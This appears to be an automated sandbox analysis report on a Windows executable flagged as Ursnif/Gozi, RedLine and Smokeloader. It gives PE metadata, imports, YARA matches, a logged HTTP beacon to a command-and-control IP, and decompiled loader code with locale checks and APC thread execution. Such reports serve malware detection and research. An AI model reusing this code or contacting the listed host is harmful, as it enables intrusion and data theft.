          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x620D9091 [Thu Feb 17 00:02:25 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:ae274c29ca15928cb1e23f2e712ba155

          Entrypoint Preview

          Instruction
          call 00007F46FCF0236Eh
          jmp 00007F46FCEFBD8Eh
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          test eax, eax
          je 00007F46FCEFBF14h
          sub eax, 08h
          cmp dword ptr [eax], 0000DDDDh
          jne 00007F46FCEFBF09h
          push eax
          call 00007F46FCEFB527h
          pop ecx
          pop ebp
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov esi, ecx
          mov byte ptr [esi+0Ch], 00000000h
          test eax, eax
          jne 00007F46FCEFBF65h
          call 00007F46FCEFEEDDh
          mov dword ptr [esi+08h], eax
          mov ecx, dword ptr [eax+6Ch]
          mov dword ptr [esi], ecx
          mov ecx, dword ptr [eax+68h]
          mov dword ptr [esi+04h], ecx
          mov ecx, dword ptr [esi]
          cmp ecx, dword ptr [0042D340h]
          je 00007F46FCEFBF14h
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF09h
          call 00007F46FCF02D48h
          mov dword ptr [esi], eax
          mov eax, dword ptr [esi+04h]
          cmp eax, dword ptr [0042D000h]
          je 00007F46FCEFBF18h
          mov eax, dword ptr [esi+08h]
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF0Ah
          call 00007F46FCF025A7h
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [esi+08h]
          test byte ptr [eax+70h], 00000002h
          jne 00007F46FCEFBF16h
          or dword ptr [eax+70h], 02h
          mov byte ptr [esi+0Ch], 00000001h
          jmp 00007F46FCEFBF0Ch
          mov ecx, dword ptr [eax]
          mov dword ptr [esi], ecx
          mov eax, dword ptr [eax+04h]
          mov dword ptr [esi+04h], eax
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          sub esp, 10h
          mov eax, dword ptr [0042C908h]
          xor eax, ebp
          mov dword ptr [ebp-04h], eax
          mov edx, dword ptr [ebp+18h]
          push ebx

          Rich Headers

          Programming Language:
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2010 build 30319
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000xdd08.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x18a140x18c00False0.5078519570707071data6.313918932739284IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x1a0000x90e880x13800False0.9314778645833334data7.82921848401168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0xab0000xdd080xde00False0.4086782094594595data4.407077801593062IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_CURSOR0xb6f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb70900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xb71c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
          RT_CURSOR0xb72b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xab5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xabe880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xacf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
          RT_STRING0xb85d80x3bedataSami LappishFinland
          RT_STRING0xb85d80x3bedataSami LappishNorway
          RT_STRING0xb85d80x3bedataSami LappishSweden
          RT_STRING0xb89980x36adataSami LappishFinland
          RT_STRING0xb89980x36adataSami LappishNorway
          RT_STRING0xb89980x36adataSami LappishSweden
          RT_ACCELERATOR0xb6ea80x90dataSami LappishFinland
          RT_ACCELERATOR0xb6ea80x90dataSami LappishNorway
          RT_ACCELERATOR0xb6ea80x90dataSami LappishSweden
          RT_ACCELERATOR0xb6e000xa8dataSami LappishFinland
          RT_ACCELERATOR0xb6e000xa8dataSami LappishNorway
          RT_ACCELERATOR0xb6e000xa8dataSami LappishSweden
          RT_GROUP_CURSOR0xb70780x14data
          RT_GROUP_CURSOR0xb83580x30data
          RT_GROUP_ICON0xb0e500x30dataSami LappishFinland
          RT_GROUP_ICON0xb0e500x30dataSami LappishNorway
          RT_GROUP_ICON0xb0e500x30dataSami LappishSweden
          RT_GROUP_ICON0xacf300x22dataSami LappishFinland
          RT_GROUP_ICON0xacf300x22dataSami LappishNorway
          RT_GROUP_ICON0xacf300x22dataSami LappishSweden
          RT_GROUP_ICON0xb6d980x68dataSami LappishFinland
          RT_GROUP_ICON0xb6d980x68dataSami LappishNorway
          RT_GROUP_ICON0xb6d980x68dataSami LappishSweden
          RT_VERSION0xb83880x24cdata
          None0xb6f380xadataSami LappishFinland
          None0xb6f380xadataSami LappishNorway
          None0xb6f380xadataSami LappishSweden

          Imports

          DLLImport
          KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
          USER32.dllLoadMenuW
          ADVAPI32.dllLookupAccountSidW
          SHELL32.dllFindExecutableA
          ole32.dllCoGetInstanceFromFile

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          Sami LappishFinland
          Sami LappishNorway
          Sami LappishSweden

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 08:25:50.375926018 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.436150074 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.436259031 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.436628103 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.495964050 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.496022940 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.496108055 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.498536110 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.557815075 CET804970162.173.142.51192.168.2.3

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 08:24:30.206993103 CET6270453192.168.2.38.8.8.8
          Mar 14, 2023 08:24:30.228854895 CET53627048.8.8.8192.168.2.3

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 14, 2023 08:24:30.206993103 CET192.168.2.38.8.8.80x2dc2Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 14, 2023 08:23:52.986346006 CET8.8.8.8192.168.2.30x15a2No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false
          Mar 14, 2023 08:24:30.228854895 CET8.8.8.8192.168.2.30x2dc2Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • 62.173.142.51

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.34970162.173.142.5180C:\Users\user\Desktop\server.exe
          TimestampkBytes transferredDirectionData
          Mar 14, 2023 08:25:50.436628103 CET248OUTGET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.51
          Connection: Keep-Alive
          Cache-Control: no-cache


          Chrome Debug Log

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:08:23:58
          Start date:14/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:239104 bytes
          MD5 hash:BFE5C79A11EF437D401FE8A27EA49372
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          Disassembly

          Reset < >

            Executed Functions

            Function 004019F1 Relevance: 27.2, APIs: 18, Instructions: 160threadsleepnativeCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
				long _v8;
				char _v12;
				char _v16;
				void* _v40;
				long _t28;
				long _t30;
				long _t31;
				signed short _t33;
				void* _t37;
				long _t40;
				long _t41;
				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D68();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012E6(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71);
						}
					} while (_v8 != 0);
					_t30 = E00401688(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012E6(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401BA9(_t66);
					goto L20;
				}
			}



























            0x004019f7
            0x004019fc
            0x00401a01
            0x00401ba8
            0x00401ba8
            0x00401a0a
            0x00401a0a
            0x00401a0e
            0x00401a11
            0x00401a12
            0x00401a18
            0x00401a1c
            0x00401a53
            0x00401a1e
            0x00401a26
            0x00401a2c
            0x00401a2e
            0x00401a33
            0x00401a39
            0x00401a3b
            0x00401a3b
            0x00401a42
            0x00401a48
            0x00401a48
            0x00401a4c
            0x00401a4c
            0x00401a5a
            0x00401a61
            0x00401a6a
            0x00401a6d
            0x00401a73
            0x00401a76
            0x00401a7f
            0x00401ba4
            0x00000000
            0x00401ba6
            0x00401a92
            0x00401a95
            0x00401a9d
            0x00401a9f
            0x00401aaa
            0x00401ab2
            0x00401ab2
            0x00401ac0
            0x00401b96
            0x00401b96
            0x00401b9c
            0x00401b9e
            0x00401b9e
            0x00000000
            0x00401ac6
            0x00401ad1
            0x00401b0f
            0x00401b15
            0x00401b27
            0x00401b2d
            0x00401b31
            0x00401b8d
            0x00401b93
            0x00000000
            0x00401b93
            0x00401b3d
            0x00401b4b
            0x00401b53
            0x00401b57
            0x00401b5e
            0x00401b61
            0x00401b63
            0x00401b63
            0x00401b6b
            0x00000000
            0x00401b6d
            0x00401b70
            0x00401b76
            0x00401b7b
            0x00401b82
            0x00401b82
            0x00401b89
            0x00000000
            0x00401b89
            0x00401b6b
            0x00401ad3
            0x00401ad8
            0x00401adf
            0x00401ae1
            0x00401ae5
            0x00401b07
            0x00401b07
            0x00000000
            0x00401b07
            0x00401ae7
            0x00401aec
            0x00401af1
            0x00401af8
            0x00000000
            0x00000000
            0x00401afd
            0x00401b00
            0x00000000
            0x00401b00

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E1508 Relevance: 18.2, APIs: 12, Instructions: 163encryptionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
